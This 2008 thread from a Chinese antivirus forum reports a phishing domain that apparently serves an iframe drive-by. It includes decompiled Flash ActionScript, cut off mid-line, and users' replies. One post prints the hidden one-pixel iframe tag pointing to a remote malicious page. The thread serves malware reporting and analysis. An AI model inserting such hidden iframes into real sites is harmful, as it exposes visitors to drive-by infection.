查看: 1749|回复: 7
收起左侧

[已鉴定] 钓鱼

 关闭 [复制链接]
爱·妖姬
发表于 2008-6-4 14:23:48 | 显示全部楼层 |阅读模式
http://imbaidu.com/

手太快按进去了iframe挂马

[ 本帖最后由 爱·妖姬 于 2008-6-4 14:52 编辑 ]

channel[1].rar

756 Bytes, 下载次数: 58

爱·妖姬
 楼主| 发表于 2008-6-4 14:53:14 | 显示全部楼层
补了个样本
冷冷
发表于 2008-6-4 14:58:21 | 显示全部楼层
这网站没有问题吧
huai168an
发表于 2008-6-4 14:59:45 | 显示全部楼层
上了没发现病毒
爱·妖姬
 楼主| 发表于 2008-6-4 15:02:28 | 显示全部楼层
// Action script...

// [Action in Frame 1]
function strtoarray(str, myarray)
{
    while (str.indexOf("|") != -1)
    {
        myarray.push(str.slice(0, str.indexOf("|")));
        var _l1 = str.slice(str.indexOf("|") + 1);
    } // end while
    myarray.push(_l1);
    return(myarray);
} // End of the function
function replinkad(linkarray)
{
    var _l1;
    var _l3;
    _l1 = 0;
    while (_l1 < linkarray.length)
    {
        while (linkarray[_l1].indexOf("^") != -1)
        {
            _l3 = linkarray[_l1].slice(0, linkarray[_l1].indexOf("^"));
            _l3 = _l3.concat("&");
            _l3 = _l3.concat(linkarray[_l1].slice(linkarray[_l1].indexOf("^") + 1));
            linkarray[_l1] = _l3;
        } // end while
        _l1++;
    } // end while
} // End of the function
function replink_deleted(textarray)
{
    var _l2;
    var _l4;
    _l2 = 0;
    while (_l2 < textarray.length)
    {
        if (textarray[_l2].indexOf("<a") == -1)
        {
            textarray[_l2] = "<a href=\'" + _root.link_array[_l2] + "\' target=\'_blank\'>" + textarray[_l2] + "</a>";
        } // end if
        _l2++;
    } // end while
} // End of the function
function preloader1(target)
{
    mc = target.pic;
    var _l2 = int(mc.getBytesLoaded() / mc.getBytesTotal() * 100);
    if (_l2 >= 100)
    {
        delete target["onEnterFrame"];
        target._width = borderwidth;
        target._height = borderheight;
    } // end if
} // End of the function
stop();
pic_array = new Array();
link_array = new Array();
text_array = new Array();
strtoarray(String(pics), pic_array);
strtoarray(String(links), link_array);
replinkad(link_array);
if (_root.textheight > 0)
{
    strtoarray(String(texts), text_array);
    replink(text_array);
    _root.text_m._x = -borderwidth / 2;
    _root.text_m._y = borderheight / 2 - textheight / 2;
} // end if
var adPos = -1;
var ifSwf = false;
if (pic_array.length > 2)
{
    if (pic_array[pic_array.length - 1].indexOf("http://ad") != -1)
    {
        var tempContent = pic_array[pic_array.length - 1];
        var i = pic_array.length - 2;
        while (i >= 2)
        {
            pic_array[i + 1] = pic_array;
            i--;
        } // end while
        _root.pic_array[2] = tempContent;
        tempContent = link_array[link_array.length - 1];
        var i = link_array.length - 2;
        while (i >= 2)
        {
            link_array[i + 1] = link_array;
            i--;
        } // end while
        link_array[2] = tempContent;
        if (_root.textheight > 0)
        {
            tempContent = text_array[text_array.length - 1];
            var i = text_array.length - 2;
            while (i >= 2)
            {
                text_array[i + 1] = text_array;
                i--;
            } // end while
            text_array[2] = tempContent;
        } // end if
    } // end if
} // end if
Stage.scaleMode = "noScale";
_root.loader.swapDepths(9);
_root.loader._xscale = Math.ceil(_root.borderwidth * 100 / 329);
_root.loader._yscale = Math.ceil(_root.borderheight * 100 / 206);
_root.loader._x = -borderwidth / 2 + 1;
_root.loader._y = -borderheight / 2 - textheight / 2 + 1;
_root.border.swapDepths(10);
_root.border._width = borderwidth - 1;
_root.border._height = borderheight - 1;
_root.border._x = -borderwidth / 2 + 1;
_root.border._y = -borderheight / 2 - textheight / 2 + 1;
_root.linkbutton1._xscale = Math.ceil(_root.borderwidth * 100 / 400);
_root.linkbutton1._yscale = Math.ceil((_root.borderheight + _root.textheight) * 100 / 300);
_root.linkbutton1._x = -borderwidth / 2 + 1;
_root.linkbutton1._y = -borderheight / 2 - textheight / 2 + 1;
var current_pic = -1;
if (pic_array.length == 1)
{
    m = createEmptyMovieClip("image0", 0);
    m_load = m.createEmptyMovieClip("pic", 0);
    m._x = -borderwidth / 2;
    m._y = -borderheight / 2 - textheight / 2;
    m_load.loadMovie(pic_array[0]);
    m.onEnterFrame = function ()
    {
        preloader1(this);
    };
    current_pic = 0;
}
else
{
    gotoAndPlay("multipic");
} // end if

// [Action in Frame 2]
function init_trans()
{
    for (n = 0; n < _root.trans_total; n++)
    {
        with (eval("_root.mask" + n))
        {
            _x = -_root.borderwidth / 2;
            _y = -_root.borderheight / 2 - _root.textheight / 2;
        } // End of with
    } // end of for
} // End of the function
function preloader(target, flagSwfPre)
{
    mc = target.pic;
    var _l3 = int(mc.getBytesLoaded() / mc.getBytesTotal() * 100);
    _root.loader.gotoAndStop(_l3);
    if (_l3 >= 100)
    {
        delete target["onEnterFrame"];
        setProperty("_root.buttonbanner.num" + (target.getDepth() + 1), _alpha, "100");
        if (_level0.image0 == target)
        {
            mc._alpha = 100;
            _root.buttonbanner.num1.gotoAndStop(3);
            _root.current_pic = 0;
            _root.timer.gotoAndPlay(2);
        } // end if
        target._width = borderwidth;
        target._height = borderheight;
        if (flagSwfPre == 1)
        {
            mc.stop();
        } // end if
    } // end if
} // End of the function
function swappic(d1, d2)
{
    with (eval("_root.image" + _root.pre_pic))
    {
        swapDepths(6);
    } // End of with
    with (eval("_root.image" + _root.current_pic))
    {
        swapDepths(d1);
    } // End of with
    with (eval("_root.image" + _root.pre_pic))
    {
        swapDepths(d2);
    } // End of with
} // End of the function
function changepic()
{
    if (pic_array.length > 1)
    {
        for (i = 0; i < pic_array.length; i++)
        {
            setProperty("_root.image" + i + ".pic", _alpha, "0");
            with (eval("_root.buttonbanner.num" + (i + 1)))
            {
                gotoAndStop(1);
            } // End of with
        } // end of for
        _root.mask_total = eval("_root.mask" + _root.trans_cur + ".mask_total");
        if (_root.mask_total > -1)
        {
            for (j = 0; j <= _root.mask_total; j++)
            {
                removeMovieClip("_root.mask" + _root.trans_cur + ".block" + j);
            } // end of for
        } // end if
        with (eval("_root.image" + _root.pre_pic + ".pic"))
        {
            setMask(null);
        } // End of with
        if (_root.ifSwf && _root.pre_pic == _root.adPos)
        {
            with (eval("_root.image" + _root.adPos + ".pic"))
            {
                gotoAndStop(1);
            } // End of with
            _root.intervaltotaltime = _root.intervaltotaltimeSave;
        } // end if
        _root.trans_cur = random(_root.trans_total);
        with (eval("_root.image" + _root.current_pic + ".pic"))
        {
            setMask("mask" + _root.trans_cur);
        } // End of with
        _root.masking = true;
        with (eval("_root.mask" + _root.trans_cur))
        {
            play();
        } // End of with
        setProperty("_root.image" + _root.current_pic + ".pic", _alpha, "100");
        setProperty("_root.image" + _root.pre_pic
爱·妖姬
 楼主| 发表于 2008-6-4 15:04:03 | 显示全部楼层
<iframe src='http://ppp.caomapi.com/pi/yzso.htm?leo' width='1' height='0' frameborder='0'></iframe>
秋叶濛濛
发表于 2008-6-4 15:34:32 | 显示全部楼层
该网站没有发现问题
qigang
发表于 2008-6-4 20:55:44 | 显示全部楼层
钓鱼非常正常,接下来打算钓美女。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 07:35 , Processed in 0.146841 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表